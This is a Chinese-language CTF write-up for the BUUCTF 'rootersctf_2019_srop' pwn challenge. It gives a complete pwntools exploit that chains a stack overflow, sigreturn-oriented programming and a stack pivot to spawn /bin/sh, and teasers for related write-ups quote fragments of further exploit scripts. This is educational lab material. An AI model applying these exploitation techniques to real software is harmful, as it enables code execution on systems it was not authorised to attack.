BUUCTF-rootersctf_2019_srop 题解

Created2026-01-12|Updated2026-01-12|BUUCTF 题解

|Post Views:

题目

checksec

这是什么鸭

vmmap

这是什么鸭

注意到 0x402000 开始有 rw 权限，在没法泄露栈地址时考虑栈迁移到上面

IDA

这是什么鸭

代码很简洁，有一个栈溢出漏洞，且有 pop rax; syscall; leave; retn; gadget ，很方便进行 srop

思路

考虑利用 srop 与栈迁移，在 0x402000 处布局栈：

+-------------------+
|     ret2gadget    |   0x402010  (rsp)
+-------------------+
|        rbp        |   0x402008
+-------------------+
|   "/bin/sh\x00"   |   0x402000
+-------------------+

利用 gadget 调用 execve syscall 即可

exp

from pwn import *

elf = ELF("./srop")
context.clear()
context.arch = "amd64"
context.log_level = 'debug'

io = process("./srop")

pop_rax_syscall_leave_retn = 0x401032
syscall_leave_retn = 0x401033

frame1 = SigreturnFrame(kernel="amd64")
frame1.rax = 0
frame1.rdi = 0
frame1.rsi = 0x402000
frame1.rdx = 0x400
frame1.rip = syscall_leave_retn
frame1.rbp = 0x402008
frame1.rsp = 0x402010

rax = p64(0xf)
payload1 = b"A" * (0x80 + 8) + p64(pop_rax_syscall_leave_retn) + rax + bytes(frame1)

io.recvuntil(b'CTF?\n')
io.sendline(payload1)

path = b"/bin/sh\x00"

frame2 = SigreturnFrame(kernel="amd64")
frame2.rax = 59
frame2.rdi = 0x402000
frame2.rsi = 0
frame2.rdx = 0
frame2.rip = syscall_leave_retn

payload2 = path + p64(0x402008) + p64(pop_rax_syscall_leave_retn) + rax + bytes(frame2)


io.sendline(payload2)
io.interactive()

Author: RatherHard

Link: https://www.ratherhard.com/post/BUUCTF-rootersctf_2019_srop.html

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

栈迁移 pwn BUUCTF srop

Related Articles

BUUCTF-NewStarCTF-2023-orwrop 题解

题目题目链接 checksec 有 canary 保护 IDA 有沙箱，考虑 orw 可利用格式化字符串漏洞泄露 canary 然后发现 mmap 开了一个 rwx 区域考虑栈迁移和 ret2shellcode 我们可以在第一次溢出时迁移 rbp 并再次调用溢出漏洞，然后由于 buf 的写入是以 rbp 为基准的，所以在第二次溢出时栈已迁移，可以直接在 rwx 段上布局 shellcode 实现 orw exp 123456789101112131415161718192021222324252627282930313233343536from pwn import *context.log_level = 'debug'context.arch = 'amd64'elf = ELF('ezorw')io = process('./ezorw') fmt = b'%11$p'io.recvuntil(b'sandbox\n')io.sendline(fm...

BUUCTF-NewStarCTF-ret2csu1 题解

题目题目链接 checksec IDA csu 中有 call [r12 + rbx*8] ，令 r12 为指向 backdoor 地址的一个地址即 gift3 ， rbp 为 0 即可调用 backdoor 根据 execve 的参数定义，令 rdi -> “/bin/cat\x00” 即 rdi = aBinCat , rsi = gift2 , rdx = 0 再调用 backdoor 即可 exp 1234567891011121314151617181920from pwn import *context.log_level = 'debug'context.arch = 'amd64'io = process('./ret2csu1')csu1 = p64(0x40072A)csu2 = p64(0x400710)rdi = p64(0x4007BB)rsi = p64(0x601050)backdoor = p64(0x601068)padding = 32 + 8payload = b&...

BUUCTF-NewStarCTF-2023-ezheap 题解

题目题目链接 checksec 全开 IDA main 菜单题 menu add 一次 add 申请两个 chunk ，记为 head_chunk 和 content_chunk delete 有明显的 UAF 漏洞 show delete 后仍可以 show edit delete 后仍可以 edit read_idx read_size 攻击思路由于一次 add 申请两个 chunk ，而一次 delete 只 free 掉 head_chunk 且不清空数据，而 delete 后仍可以 edit，所以我们可以通过两次 delete 和一次 add 获得一个 head_chunk 的控制权，进而利用 edit/show 实现 AAW/AAR 同时，在上面的操作之前 delete 掉一个 head_chunk 使之进入 tcache ，我们可以利用 chunk 的残留值泄露堆地址，实现对堆的完全控制然而由于我们并没有操作栈的机会，也没有办法劫持 got 表，因此我们考虑去劫持 __free_hook 函数，这需要泄露 libc 基址由于 tcache ...

BUUCTF-ZJCTF-2019-EasyHeap 题解

题目题目链接 checksec IDA main 菜单题 menu create delete edit 有明显的堆溢出，考虑通过 fastbin 获取在 heaparray 附近的 fake chunk ，再劫持 heaparray 以实现任意地址写 got systemplt 构造合适位置的 fake chunk 0x6020ad 处有满足 size = 0x7f 的 fake chunk ，故申请 0x68 字节，使用 0x70 的 fastbin 链表攻击思路先利用堆溢出漏洞劫持已进入 fastbin 的 chunk 的 fd 指针为 fake chunk 地址 0x6020ad 再通过 malloc 申请这块 fake chunk ，同时在 fake chunk 写入 payload 劫持 heaparray[0] 由于我们希望通过 system(“/bin/sh”) 提权，然而 elf 中并没有 “/bin/sh” 字符串，这需要我们手动写入更坏的是，我们似乎并没有操纵栈的机会，只能通过劫持 got 表短暂地劫持程序流程，，，所以这里有一...

BUUCTF-bjdctf_2020_babystack 题解

题目题目链接 checksec IDA 很显然，由于 nbytes 可以被赋予一个较大的值，使得 buf 可以被溢出。 backdoor 思路利用的栈溢出漏洞覆盖函数返回地址，使之返回到这个后门函数提权即可。附一个图示：根据 buf 的位置 [rbp-10h] 可构造 payload = b'A' * (16 + 8) + backdoor_addr 实现攻击，由于需要栈对齐，其中，backdoor_addr = 0x4006ea ，而不是 backdoor_addr = 0x4006e6 exp 1234567891011121314151617181920from pwn import *context.log_level = 'debug'context.arch = 'amd64'p = process('./bjdctf_2020_babystack')p.recvuntil(b'name:\n')payload = b'40'p.sendline(pay...

BUUCTF-jarvisoj_fm 题解

题目题目链接 checksec IDA 利用格式化字符串漏洞篡改 x 为 4 即可，注意这里是 32 位 exp 123456789101112from pwn import *context.log_level = 'debug'context.arch = 'i386'p = process('./fm')x_addr = p32(0x804A02C)payload = x_addr + b'%11$n'p.sendline(payload)p.interactive()